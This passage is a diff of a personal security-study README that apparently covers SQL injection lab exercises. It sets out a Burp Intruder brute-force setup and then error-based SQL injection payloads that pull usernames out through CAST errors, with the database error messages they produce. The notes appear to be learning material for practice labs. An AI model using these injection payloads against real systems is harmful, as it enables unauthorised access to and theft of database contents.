xasyhack/xasyhack.github.io/README.md

       **Position**:§1§,§a§; **Paylaods**: payload 1: numbers; payload 2: brute forcer a-z,0-9-->Start Attack-->Find 500 response code
 25. Visible **error-based** SQL injection
     - Single quote to output verbose error message
-      Unterminated string literal started at position 52 in SQL SELECT * FROM tracking WHERE id = 'vwGUdLnAnuxjsJBf''.
-Expected  char
+      ERROR: "Unterminated string literal started at position 52 in SQL SELECT * FROM tracking WHERE id = 'vwGUdLnAnuxjsJBf''.
+Expected  char"
     - `' AND CAST((SELECT 1) AS int)--`
-      ERROR: argument of AND must be type boolean, not type integer Position: 63
+      ERROR: "argument of AND must be type boolean, not type integer Position: 63"
     - `' AND 1=CAST((SELECT 1) AS int)--`
       No error
     - `' AND 1=CAST((SELECT username FROM users) AS int)--`